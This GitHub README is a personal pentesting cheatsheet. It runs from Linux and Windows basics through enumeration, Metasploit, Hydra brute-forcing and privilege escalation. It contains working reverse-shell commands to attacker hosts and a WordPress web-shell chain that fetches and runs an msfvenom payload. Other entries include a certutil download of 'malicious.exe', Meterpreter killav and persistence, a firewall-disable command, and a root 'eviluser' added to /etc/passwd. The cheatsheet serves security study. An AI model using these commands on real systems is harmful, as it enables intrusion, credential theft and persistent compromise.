Skip to content

AmrAhmadKali/pentesting-cheatsheet

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

29 Commits
Penetration Testing Course.md
Penetration Testing Course.md
 
 
README.md
README.md
 
 

Repository files navigation

pentesting-cheatsheet

Table of Contents

I. [Linux Operating System](## I. Linux Operating System) II. [Windows Operating System](## II. Windows Operating System)

  • cmd
  1. Windows Operating System
  2. Network Enumeration
  3. Exploitation
  • Burp Suite
  • Hydra
  • Reverse Shell
  1. Privilage Escalation

I. Linux Operating System

  • Shortcuts CTRL + P change the prompt style

  • Commands file <a-file> print the type of the file

cat -n <a-file> print the content of the file with the line numbering

less -F <a-file> print the content of file + waiting for chnages in it to display

head -n 3 print first 3 lines

tail -n 3 print last 3 lines

man -k printf man –k ‘^shadow$‘ Search the short descriptions and manual page names for the keyword printf as regular expression. Print out any matches. Equivalent to apropos printf.

set print all system variables of the system

echo $HISTFILE print the value of the system variable that stores the shell history

history or cat ~/.zsh_history to print the shell history for the current user

alias ll='ls -la' setting an alias to a command

Hint to make the alias permenant also after ending the session append alias ll='ls -la' to ~/.zshrc. ~/.zshrc contains the commands that are excuted at start of interactive shell.

cat /etc/issue print the version of linux distribution

Hint Another useful tool is the command uname for identifying the specification of the target linux machine

e.g.: uname, uname -v, uname -a or uname -r

ls -l O[a-e]* list all files/dir. that contains letters a-e in the second letter

or ls -l O[c-i][d-f] second letter c-i third letter d-f

which sbd locate a program that is included to the PATH variable

locate mimikatz.exe locate a file or a folder through the database locate.db instead of searching the local drive

Another way of searching the file system is find command that uses recursion to search and have among others these options e.g.:

  • -name to search by name (case sensitve)
  • -iname to search by name (case insenstive)
  • -type f/d/l/s to search by type (files, directories, links, sockets)
  • -size to search by size
  • -mtime to search by modification date
  • -user to search by user
  • -perm to search by permissions given

echo -n "within the same last line" >> text.txt append to a file and the -n ensures that we append in the same last line

Within the redirect streams in Linux there is the symbol < which used when a file content should be readed in another program input

grep -i "stderr" .bash_history search for "stderr" but case insensitive

grep -r "root" /boot search recursively for a regular expression

  • sed is command that is used to edit streams on the fly echo "Ich hasse Linux" | sed 's/hasse/liebe/' -> Ich liebe Linux

cut is used to cut some content of a stream. Often it is being used with -f (field) and -d (delimeter) echo "Ich mag Hacking, Blumen, Feen, Programmierung und IT-Sicherheit." | cut -f 1,4 -d ',' -> Ich mag Hacking, Programmierung und IT-Sicherheit

awk is a whole programming language for text editing. 2 common options when dealing with it in the shell are -F for definition of fieldseparators and the Subprogram print for printing the resulted text echo "ist:das:wirklich:so" | awk -F ":" '{print $4, $3, $1, $2}' -> so wirklich ist das

comm scan-a.txt scan-b.txt compare 2 sorted files and show the common and differences between them With no options, produce three-column output. Column one contains lines unique to FILE1, column two contains lines unique to FILE2, and column three contains lines common to both files.

   **-1**     suppress column 1 (lines unique to FILE1)

   **-2**     suppress column 2 (lines unique to FILE2)

   **-3**     suppress column 3 (lines that appear in both files)

diff scan-a.txt scan-b.txt show the different lines of both files

diff -c scan-a.txt scan-b.txt compare 2 files with -c context format

diff -u scan-a.txt scan-b.txt compare 2 files with -u unified format

vimdiff scan-a.txt scan-b.txt better compare as 2 lists

Account Management
  • Locking a user Account

  1. Usermod –L username Lock a user's password. This puts a '!' in front of the encrypted password, effectively disabling the password.

  2. Passwd –l username  lock the specified account

  3. Editing /etc/shadow and adding ! before the password field the edit can be done by vim or nano

  4. Another possibility is changing login Shell in /etc/passwd to /bin/false or /sbin/nologin sudo usermod -s /sbin/nologin alice or sudo usermod -s /bin/false alice

sudo passwd --status alice checking user account info and validity

NOTE All groups can be found in /etc/group

  • when the group has only the main user as members the 4th column in /etc/group would be empty.

groups $username list all groups the user is in

Note A requirement to use sudois to be in the group sudo. Note With modifying the /etc/sudoers you can change the configurations of sudo

sudo -l check the permissions of the current user

  • One common command for sudo to obtain root shell is: sudo -i

su -l student -c whoami run one liner command as another user

Linux Processes

Ctrl + z pause a running job/process

Ctrl + c stop a running job

jobs control all current jobs and then: fg %1 or bg %2 move the job with a specific number to fore- or background

ps -ef overview of all processes -e all processes and -f all fields (e.g. uid,pid, ppid)

ps -fC "ping" search for a specific process name

kill <pid> end a process

w quick snapshot of users activities and system status.

watch -n <time in seconds> w run a program cyclic

Packet management

in Kali: Advanced Packet Tool (APT) that been used to manage packets with update , upgrade, install, remove

apt-cache search pure-ftpd search available packets

- To delete a packet we use ``remove`` , which can be extended with ``--purge`` to delete also all installation files like configuration files
Task Management (Cron tasks)

  • All periodic tasks can be found in /etc/cron.* (The * stands for the frequence) i.e: ls -lah /etc/cron.* Note scripts under /etc/cron.* runs per default as root

  • Also under /etc/crontab we could specify tasks that run on customized time and as specific user (not only root)

Logging

In Unix-like systems the protocol data is stored under /var/log i.e. ls -l /var/log

For all authentication attempts auth.log: tail auth.log

For all logins you can see /var/log/wtmp, which can be accessed using last and who i.e.: who /var/log/wtmp

sudo dmesg information about kernel events (USB devices connected, disconnected, hard drive errors, initial hardware detection)

journalctl show systemd events log (Actions triggered by services, timers, devices, paths, or boot processes) - Logs from all systemd services (systemd events) - Kernel logs - Boot logs - Logs from standard output (stdout) and error (stderr) of services

Memory and Hard drive

free -m show information about the memory RAM

df -h shows disk space usage on all mounted filesystems in a human-readable format

dd if=source of=destination bs=4M status=progress is used to copy data at a low level, byte by byte, using the dd tool.

Part Meaning
if=source Input file (the source you’re copying from)
of=destination Output file (the destination you’re copying to)
bs=4M Block size: read/write in 4 megabyte chunks (faster than default 512B)
status=progress Shows real-time progress while copying

Be careful

  • dd is powerful but dangerous — if you mix up if= and of=, you can overwrite data!
  • Always double-check device names with lsblk or fdisk -l

lsblk list information about block devices (like hard drives, SSDs, USB sticks) in a tree-like format.

fdisk manage disk partitions. Works on MBR (Master Boot Record) partition tables.

sudo fdisk -l List all disks and their partition details

du -d 2 -h check the disk usage of directories, with a specific depth and in a human-readable format.

sudo mount /dev/sdb1 /mnt/data Device (e.g., /dev/sdb1), mount point (e.g., /mnt/data)

sudo umount /mnt/usb unmount

mount -t ext4 mount print information about already mounted file systems with the specified file system type

sudo usermod -a -G <list_of_groups> <user> to add an existing user to an existing group

id print User ID and group IDs Different options of id: -g, --group : print only effective group id -G, --groups : print all group IDs -r, --real : print only real user id -u, --user : print only effective user id

II. Windows Operating System

Shells in Windows:

  1. cmd.exe
  2. PowerShell
  3. WMIC – Windows Management Instrumentation Console
  4. Windows Subsystem for Linux (WSL)

• Command Prompt (cmd.exe) − Enables interaction with Win32 objects and applications
− Creating and manipulating files, navigating the file system
− Executing batch files (shell scripts)
− But: access to central functions of Windows system administration is not possible!

• PowerShell
− is:
▪ a command-line tool
▪ a scripting language
▪ a configuration management framework
− Based on the .NET Framework or .NET Core
− Also runs on Linux and macOS (open source)
− So-called cmdlets can be used to perform administrative tasks

CMD

echo.bat run the shell script (Batch file) echo.bat

help show all functions that has been programmed in the shell directly (aka. builtins)

help < command-name > or < command-name > /? print a help info for a specific command

cd is for navigation in the file system cd/orcd`` change directory to root

type file.txt output the content of a file

dir Show the content of a directory = ls in Linux

systeminfo show system information

Environment variables are referenced in windows with percentage symbol : %PATH%

set without parameters : show all environment variables With parameters : set temporary environment variables.

setx permanent establishment an environment variable

  • Sysinternals is developed by Microsoft to address the lacking functionality that CMD does not have per default.
    • It is not per default installed
    • Before Usage the should End-User-LicenseAgreement (eula) accepted first Option /accepteula

i.e. psinfo /accepteula show local system info. the option /accepteula is used the first time after installation.

echo can be used to print to the console and is used also for writing into files

echo "Write this text into a File" > NewFile.txt write to a file

echo 2> EmptyFile.txt Create an empty file -- by redirecting the errors of the echo command to the file

del EmptyFile.txt delete a file

rename NewFile.txt RenamedFile.txt or ren NewFile.txt RenamedFile.txt rename a file

move RenamedFile.txt .\Folder move a file

mkdir Subfolder Create a folder

rmdir Subfolder remove a folder

copy RenamedFile.txt CopiedFile.txt copy a file

  • xcopy and robocopy are 2 other commands for copying files that is mostly used in Batch Scripts

fc RenamedFile.txt CopiedFile.txt compare the content of 2 files --file compare

mklink softlink fileToBeLinkedTo.txt create a soft symbolic link

mklink /h hardlink anotherFileToBeLinkedTo.txt create a hard symbolic link

dir /s fileTofind.txt search for a file in the current dir and the sub directories

dir /s *.txt search with a wildcard

tree show the tree of the folders in current path

tree /F show the files and folders structure in the current path as graph

forfiles
selects a file (or set of files) and executes a command on that file

forfiles /P C:\Windows /S /M notepad.exe /c "cmd /c echo @PATH" find the path of a file

  • /P search path (starting point)
  • /S recursive search
  • /M match the target Object
  • /c command that should be run on the object Note In the Windows forfiles command, the @ symbol is used as a variable placeholder for properties of each file it processes. @PATH = the full path to the matched file (e.g., C:\Windows\System32\notepad.exe)

find "Passwort" C:\Users\Steff\Folder\doNotShare.txt or type doNotShare.txt | find "Passwort" search for a text in files

find command can be used as grep in Linux just without regular expressions; like in: type doNotShare.txt | find "Passwort"

findstr command searches for strings and accepts regular expressions and multiple strings search. Note When given 2 Strings seperated with a space. The output of the command will be the text line that includes one of the 2 Strings; like in: findstr "File Passwort" doNotShare.txt

sort wordsToSort.txt sort text in a file

whoami /user show SID (Security Identifier) of the current windows user

Local Accounts and Groups

• By default, a Windows system includes several predefined users or groups:

Administrator:

  • Created for the system administrator
  • SID: S-1-5-domain-500
  • Has full access rights to files and directories
  • Disabled by default in Windows 10
  • During installation, another account receives administrator rights by being added to the Local Administrator group

Guest:

  • Allows unregistered users to log in to the machine with limited privileges
  • No password by default
  • Disabled by default
  • SID of the Guest group: S-1-5-32-546

SYSTEM:

  • Used by the operating system to run services that require elevated privileges
  • This account cannot be accessed or logged into by a human user

net command is used to create and administrate users and groups like creation deletion edit of accounts or groups

net user /add add new local account Note requires Adminstrative privilege

net user {username} show info about an Account i.e if the user is active or not

Local groups on the system are found in the localgroup group.

  • The net command can also be used to view the members of a localgroup and to modify their membership. Particularly interesting groups:
  • Administrators: Members have the same rights as the Administrator account
  • Remote Desktop Users: Only members of this group can access the desktop (GUI) of the target system remotely Group membership can be modified using: net localgroup <groupname> <username> <option>

—for example, to add or remove a user from a group.

net accounts show and edit account policy

tar -xf ncat.zip unzip extract a compressed file

Linux Networking & Services

ifconfig or ip addr show details of network devices and interfaces

Change IP Address in shell:
Change to specific IP address

cat /etc/network/interfaces then append the following and substitute the interface details: allow-hotplug [interface] iface [interface] inet static address [IP] netmask [Netmask] gateway [Default_Gateway]

then sudo ifdown [interface] sudo ifup [interface]

Change to be automatically set by a DHCP Server

change the /etc/network/interfaces configuration File to append: allow-hotplug [interface] iface [interface] inet dhcp

-- hostname show hostname (very often also shown after the @ symbol in the prompt)

netstat -natup enumeration to the aktive and non aktive connections on the ports -n numeric addresses -a listening and not listening sockets -t TCP-Connections -u UDP-Connections -p PID und name of the program

ss -netup another utility to investigate sockets

arp -en enumerate the connections on layer 2 of OSI Model(arp cache)

route show IP routing table

  • DNS Server (nameserver) is contained in /etc/resolv.conf
  • fixed entries (without extra DNS Server) are stored in /etc/hosts
  • The order of name resolution is in /etc/nsswitch.conf (Name Service Switch)

host www.megacorpone.com show the ip address of a specific domain

host -t mx www.megacorpone.com and host -t txt www.megacorpone.com show entries for txt or mx in a specific domain

nslookup kali.org and dig kali.org show dns records

dig -t mx www.megacorpone.com show mx entries in the domain

dig @8.8.8.8 kali.org dig command through a specific name domain

SSH

sudo systemctl start ssh start ssh server

sudo systemctl status ssh check the ssh status

ssh username@host establish a ssh connection

who show currently active users

exit exit ssh

  • configuration of the ssh client : /etc/ssh/ssh_config
  • Configuration of the daemon ( server process) of ssh : /etc/ssh/sshd_config

ssh kali@god -p 999 run ssh with other port than the standard port 22

  • List of the known hosts in the ssh service: ~/.ssh/known_hosts
  • ~/.ssh/authorized_keys : The authorized_keys file in SSH specifies the SSH keys that can be used for logging into the user account for which the file is configured.

The Automatic saving of hosts in ~/.ssh/known_hosts is prevented by:

  • edit /etc/ssh/ssh_config ??!
  • or running ssh with the option : -o stricthostkeychecking=no

ssh -i id_rsa cactus@10.10.201.219 connect to a specific host with a given identitity file/ private key (-i) over SSh

scp username@host:remote-file-path secure copy a remote file Note under some circumstances it is necessary to the password of ssh be saved and reused in a script. with that sshpass can help sshpass -p "password" ssh kali@localhost

  • Netcat Netcat can redirect the input of STDIN through the network. With this we can send whole files.

Netcat can also redirect the whole output of programms over the network. For that you should compile netcat with the flag -DGAPING_SECURITY_HOLE set, then nc should be run with the flag -e to redirect STDIN, STDOUT and STDERR.

  • Wget wget < webseite _url > download data from the internet -O : store output in a specific folder -o : create log file --recursive : recursive download of website (!! Warnning)

  • Curl curl https://www.kali.org simple way of manipulating server responses

When you use curl to download, you must specify output target curl < webseite_url > -o doku_kali.org

curl https://www.offensive-security.com -I output the HTTP Headers of the response -- Should be used if the response is binary data, because when receiving binary data with curl, you should specify a output folder.

  • FTP ftp 10.11.1.14 establish a ftp connection

  • To send files to the server use put: put client.txt

  • To receive files from the server use get: get cmd.asp

  • To change the encoding of the sended data: bin or ascii

  • Firewalls, ACL and iptables

sudo iptables -L list ACL for the netfilter packet-filter-framework

  • Filter Tablle The standard table is in 3 chains: INPUT, OUTPUT and FORWARD data traffic

sudo iptables -P FORWARD DROP change the policy

For editting the filter table: -p the protocol mostly tcp, udp or icmp -s the source in CIDR Notation -d destination Address -i or -o for interfaces for input and output -A the chain that the command is editting

e.g. sudo iptables -s 192.168.1.0/24 -p all -A INPUT

sudo iptables -L --line-numbers list the rules with the respective order

sudo iptables -D INPUT 1 delete a rule

sudo iptables -nvL messure traffic

Linux Password Cracking

sudo unshadow /etc/passwd /etc/shadow > hashes.txt john --format=crypt --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt that is a one way to crack password with john the ripper with this format

Python Sripting

  • Switch between Python 2 and 3 $ pyenv versions $ pyenv global 2.7.15 (Python 2) $ pyenv global system (Python 3) $ python --version

Network Enumeration

Nmap

e.g nmap -sS -sV -A 192.168.6.xxx important options:

  • [-p Port]

  • [-sn] ping scan -disable port scan

  • [-PN] Skip host discovery (treat all hosts as online)

  • [-sU] UDP scan (can take long time)

  • [-sV] Version detection

  • [-O] OS detect

  • [-A] OS & Version Detection, Script Scanning, Traceroute

  • [-sT] TCP connect() Scan

  • [-sS] SYN Stealth Scan (Note when using VPN, Port forwarding via SSh, Proxies)

  • [-T <0-5>] set timing template(higher is faster)

  • A port can be opened, filtered, closed oder not filtered

  • Nmap Script Engine (NSE) [-sC or -script=< script >]

  • [--top-ports=#] show how many of the top-ports have to be scanned

  • [-oG] save the scan result in a file

  • Script nmap automator

  • Nmap Cheatsheet

Banner Grabbing

nc -vn 192.168.6.44 21 banner grabbing with nc (-v verbose, -n numirical ip address)

Port Enumeration
53 DNS

Slide 60-65 Information Gathering

host -t ns megacorpone.com look up/search for the type ns (Name Server)in the DNS records of megacorpone.com

host -l megacorpone.com ns1.megacorpone.com show the DNS zone file if it is not protected

  • dnsrecon dnsrecon -d megacorpone.com -t axfr DNS Zone transfer with AXFR Protocol

  • dnsenum dnsenum th-deg.de DNS enumumeration for a specific Website

139/ 445 or 137 (UDP) SMB

sudo enum4linux -S < ip Address > enumerating the shares

smbclient -L //10.10.201.219/ list the SMB shares Note Forward slash is for linux targets

Note After connecting with a share you can download a file from the share by typing get <file: e.g. id_rsa> and to get out type exit

  • ls -l /usr/share/nmap/scripts/smb* list scripts in nmap script engine(NSE) for SMB

  • Enumerate with nmap : nmap --script smb-vuln* -p 139,445 [ip] nmap -v -p 139,445 -oG smb.txt 10.11.1.1-254

  • Enumerate with nmap on windows machine: nmap -p 135,445 --script=smb-vuln-ms* 10.11.1.5 Note Port 135 is for msrpc

  • Enumerate with nbtscan nbtscan -r 10.11.1.0/24

  • The auxiliary/scanner/smb/smb_version Metasploit for Enumeration and fingerprinting

111 NFS

  • nmap -sV -p 111 --script=rpcinfo 10.11.1.1-254 Enumerate NFS for shares with nmap

  • ls -l /usr/share/nmap/scripts/nfs* list scripts in nmap script engine(NSE) for NFS

  • nmap -p 111 --script nfs* 10.11.1.72 Enumerate NFS with all nmap scripts of NFS

  • mkdir home sudo mount -o nolock 10.11.172:/home ~/home/ cd home && ls mounting and accessing a share in a remote NFS Server

25 SMTP

  • intreseting Commands e.g. VRFY and EXPN

  • nc -vn 10.11.1.217 25 Enumeration of SMTP with netcat (Banner Grabbing)

80, 443 HTTP, HTTPS

  • Developer tools Shortcut: CTRL + Shift + I

  • /robots.txt and /sitemap.xml files have often some helpful hidden details

  • gobuster dir -u [URL] -w /usr/share/wordlists/dirb/common.txt Enumerate directories of a website

  • Other wordlists could be found in /usr/share/seclists/Discovery/Web-Content/

  • for i in {1..100}; do curl -s -L -i http://<IP>/?author=$i | grep -E -o "\" title=\"View all posts by [a-z0-9A-Z\-\.]*|Location:.*" | sed 's/\// /g' | cut -f 6 -d ' ' | grep -v "^$"; done Enumerating users on a Wordpress Website

  • wpscan -u <IP> --threads 10 --wordlist /usr/share/wordlists/rockyou.txt --username admin

nikto -h 192.168.1.1 vulearability scan to the specified host (-h)

Exploitatiotion

Search for Exploit

searchsploit

  • search exploit in explot-db: searchsploit <exploit term> searchsploit -u update archive The Exploits then are found in /usr/share/exploitdb/exploits/

  • Automated exploit search on exploit-db: nmap -sV -oX file.xml <target> searchsploit --nmap file.xml

getsploit :tool searches in multiple collections: Exploit-DB, Metasploit, Packetstorm andothers
  • pip install getsploit
  • getsploit wordpress 4.7.0

Exploit Frameworks

− Cobalt Strike (https://www.cobaltstrike.com/) − Metasploit Framework (https://www.metasploit.com/) − Metasploit Pro (https://www.rapid7.com/products/metasploit/) − CORE IMPACT (https://www.coresecurity.com/core-impact) − Immunity CANVAS (https://www.immunityinc.com/products/canvas/) − D2 Elliot Web Exploitation Framework (https://www.d2sec.com/elliot.html) − BeEF Browser Exploitation Framework (https://beefproject.com/)

Metasploit

msf > search [regex] Search for module or exploit (or CVE):

msf > use exploit/[ExploitPath] Specify and exploit to use:

msf > set PAYLOAD [PayloadPath] Specify a payload to use:

msf > show options Show options for the current modules:

msf > set [Option] [Value] Set options

msf > exploit or msf > run Start exploit:

msf > debug Display information useful for debugging

Windows Meterpreter

meterpreter > help meterpreter > clearev meterpreter > download c:\PATH meterpreter > ifconfig meterpreter > migrate PID meterpreter > sysinfo meterpreter > background meterpreter > shell meterpreter > keyscan_start meterpreter > getsystem (Voraussetzung Admin-Account) meterpreter > hashdump Windows Meterpreter Mindmap

  • Meterpreter Scripts mostly for Post Exploitation meterpreter > run checkvm meterpreter > run getgui meterpreter > run get_local_subnets meterpreter > run killav meterpreter > run winenum meterpreter > run metsvc meterpreter > run persistence meterpreter > run getcountermeasure meterpreter > run packetrecorder

  • Ncat Victim (windows) ncat -v 10.11.0.215 444 -e cmd.exe --ssl Attacker (Kali) ncat -lvp 444 --allow 10.11.14.53 --ssl

WordPress

  • After loging in : Metasploit module : exploit/unix/webapp/wp_admin_shell_upload OR Manual : Uploading Shell In WordPress

  • curl -v "http://<IP>/wp-content/themes/twentytwelve/404.php?$(python -c 'import urllib; print urllib.urlencode({"cmd":"uname -a"})')" injecting a command through a URL parameter

  • Full manual exploit of WordPress for getting reverse shell: msfvenom -a x86 --platform linux -p linux/x86/meterpreter/reverse_tcp LHOST=<Attacker_IP> LPORT=443 -b "\x00" -f elf -o /var/www/html/shell.elf service apache2 start curl -v "http://<IP>/wp-content/themes/twentytwelve/404.php?$(python -c 'import urllib; print urllib.urlencode({"cmd":"wget <Attacker_IP>/shell.elf"})')" curl -v "http://<IP>/wp-content/themes/twentytwelve/404.php?$(python -c 'import urllib; print urllib.urlencode({"cmd":"chmod +x shell.elf"})')" curl -v "http://<IP>/wp-content/themes/twentytwelve/404.php?$(python -c 'import urllib; print urllib.urlencode({"cmd":"./shell.elf"})')"

Web Applications
  • Vulnerability Scanner (Subdomain Finder): Nuclei
  • Multi Purpose (Scanner, Proxy, Sequencer, Comparer, Intruder,Repeater): Burp Suite
  • SQL Injection / Database Fingerprinting: sqlmap
  • Directory Scanner: DirBuster, gobuster, feroxbuster, Dirsearch, DIRB, ffuf, Wfuzz, OWASP ZAP, …
  • Path Traversal: dotdotpwn

Payload

CyberChef Ciphey automated decryption/decoding/cracking tool Payloads All The Things (Bypasses & Payloads for Web Application Security)

Shellcode

Introduction to Writing Shellcode OffSec MSFvenom

msfvenom

msfvenom --list platforms msfvenom --list archs msfvenom --list payloads msfvenom --list encoders

msfvenom -p linux/x64/shell_reverse_tcp LHOST=127.0.0.1 LPORT=8080 -f c encode shell code for reverse tcp shell Payload in format C (C Language)

Burp suite

Ctrl + Shift + D Dashboard Ctrl + Shift + T Target tab Ctrl + Shift + P Proxy tab Ctrl + Shift + I Intruder tab Ctrl + Shift + R Repeater tab

Password Cracking

Note Before you crack a password you should google it ==> probably saves a lot of time

  • To find the type of the hash hash-identifier Tool helps

Hashes in OS can be found in :

  • Linux : /etc/shadow
  • Windows : sam file (system32\config\sam)
  • Active Directory : NTDS.dit

− Linux: /etc/shadow Format of the Hashvalue: $id$salt$hash

  • $1$: MD5-based crypt ('md5crypt')
  • $sha1$: SHA-1-based crypt ('sha1crypt')
  • $5$: SHA-256-based crypt ('sha256crypt')
  • $6$: SHA-512-based crypt ('sha512crypt')

− Windows: sam file (system32\config\sam) Format of entity : uid:rid:lm_hash:ntlm_hash

  • LM Hash Alg. is outdated and therefore in modern Systems the value LM_Hash is filled with the Hashvalue of the empty String (aad3b435b51404eeaad3b435b51404ee)

Offline Crack Tools : mimikatz, pwdump, fgdump, wce, L0phtCrack, OphCrack, RainbowCrack, Cain & Abel, John the Ripper, Hashcat

Online Crack Tools: Aircrack-ng, pth-winexe, Brutus, Hydra, THC-Hydra, Medusa, Ncrack, Burp Suite Intruder

Webseits for Password Cracking : (onlinehashcrack.com)

(hashkiller.io/listmanager) (inkl. additional Tools)

(hashes.com/en/decrypt/hash) (inkl. additional Tools)

(crackstation.net)

and also maybe helpful : CyberChef

  • common Wordlists /Dictionaries : − rockyou.txt in Kali Linux under /usr/share/wordlists/ − https://github.com/danielmiessler/SecLists (many Wordlists, not only PW!) − weakpass.com/wordlist (many Password-Dumps) − packetstormsecurity.com/Crackers/wordlists
Hashcat

hashcat -m 400 -a 0 -o wppass.txt --remove wp.hash /usr/share/wordlists/rockyou.txt ==> ?

Hydra

The options we pass into Hydra depend on which service (protocol) we’re attacking. For example, if we wanted to brute force FTP with the username being user and a password list being passlist.txt, we’d use the following command:

hydra -l user -P passlist.txt ftp://MACHINE_IP

  • On SSH hydra -l <username> -P <full path to pass> MACHINE_IP -t 4 ssh

    -l specifies the (SSH) username for login -P indicates a list of passwords -t sets the number of threads to spawn

  • On Post Web Form You must know which type of request it is making; GET or POST methods are commonly used. sudo hydra <username> <wordlist> MACHINE_IP http-post-form "<path>:<login_credentials>:<invalid_response>"

Option Description -l the username for (web form) login -P the password list to use http-post-form the type of the form is POST < path> the login page URL, for example, login.php < login_credentials> the username and password used to log in, for example, username=^USER^&password=^PASS^ <invalid_response> part of the response when the login fails -V verbose output for every attempt

Below is a more concrete example Hydra command to brute force a POST login form:

hydra -l < username > -P < wordlist > MACHINE_IP http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V

The login page is only /, i.e., the main IP address. The username is the form field where the username is entered The specified username(s) will replace ^USER^ The password is the form field where the password is entered The provided passwords will be replacing ^PASS^ Finally, F=incorrect is a string that appears in the server reply when the login fails

  • hydra -l email@yahoo.com -P passwortliste.lst -s 465 -S -v -V -t 1 smtp.mail.yahoo.com smtp [-s 465] the target port of the SMTP service , it is SMTPS so its port is 465

[-S] tells Hydra to use SSL/TLS for the connection. This is necessary for secure SMTP connections on port 465.

[-v] verbose

[-V] enables even more verbose output, showing each attempt that Hydra makes

Reverse Shell and Web Shell

nc -e Workaround

nc -nlvp 8080 netcat to listen on the port 8080

nc localhost 8080 netcat to connect

Because new versions of nc have no -e or -c options, here is a workaround to pass the shell through nc: On ‘server’ side:

       $ rm -f /tmp/f; mkfifo /tmp/f
       $ cat /tmp/f | /bin/sh -i 2>&1 | nc -l 127.0.0.1 1234 > /tmp/f

 On ‘client’ side:

       $ nc host.example.com 1234
       $ (shell prompt from host.example.com)

more on that see (https://manpages.ubuntu.com/manpages/bionic/man1/nc_openbsd.1.html)

  • Port 53 is rarely blocked on the the firewalls of victim machines. It is perfect for listening in reverse shell.
  • Reverse Shell Generator

python -c 'import pty;pty.spawn("/bin/bash")' ^Z stty raw -echo; fg export TERM=xterm ` Upgrade to pseudo tty terminal **Where : ** Ctrl + Z to suspend the terminal process (move to background) stty Command to control the terminal settings, so that the terminal passes its input as raw input (byte by byte) and doesn´t handle Ctrl + C, Ctrl +D but hands them to the program TERM=xterm to allow things like clear screen

Post Exploitation

File Transfer
  • Tools: wget, nc, ftp, certutil, …
  • With Scripts: VBScript, Powershell, Python
  • Encoding/Decoding

− Example of Encoding/Decoding Keepass Database: [convert]::ToBase64String((Get-Content -path "C:\users\bob\documents\Database.kdbx" -Encoding byte)) or in Linux:

echo "A9mimmf7S7UBAAMAAhAAMcHy5r9xQ1C+WAUhavxa/wMEAAEAAAAEIADwMjakIrOmKjXoiAtsOFsZrOMd  
…
ChKxkL40QoEcNR4lulm6spUfDOfD5NZTxcMJnPTtJqqgdzOnUzUB/QGlCspNFaCyNCuVsZFdBIqAQsb9CJOANuTsZNa3y67DOFi0BRDx9T2RC7L87ZPx4lsGdiKNV6D1Oda3D+L+F6kJHJ1TYfwPIzpxaZRYpCDzRtFgMc4JD4qA==" | base64 -d > database.kdbx
Privilage Escalation

GTFOBins LOLBAS certutil.exe -urlcache -split -f "https://hackers.home/malicious.exe" bad.exe download a file in cmd using LOL Techniques

netsh wlan show profile Shows all wireless profiles stored on the computer. These profiles contain saved SSIDs (network names), security settings, and keys (passwords).

netsh wlan show profile name="HomeNetwork" key=clear display the password of a specific network

netsh advfirewall set allprofiles state off disable the Windows Firewall for all profiles Note needs admin rights

setuid Privilage Escalation

SUID, GUID and Sticky Bit

Real, Effective and Saved UserID

find / -user root -perm -4000 -print 2>/dev/null find all files that have the setuid bit set

find / -perm +6000 2>/dev/null | grep "/bin" grap binaries with set uid or set gid on Note deprecated. use -perm /mode instead

Misconfigured file permissions Example

find / -type f -perm 0777 -> /etc/passwd

ls -l /etc/passwd -> -rwxrwxrwx ...

mkpasswd --method=md5 --salt=vb1tLY1l PASSWORD generate an MD5-hashed password with a custom salt

cat new passwd >> /etc/passwd the new passwd file includes a line like: eviluser:$1$vb1tLY1l$If2W7VheNl4T1y7DZJPnQ/:0:0::/root:/bin/bash

Other good cheatsheets

About

No description, website, or topics provided.

Resources

Readme
Activity

Stars

1 star

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

 
 
 

Contributors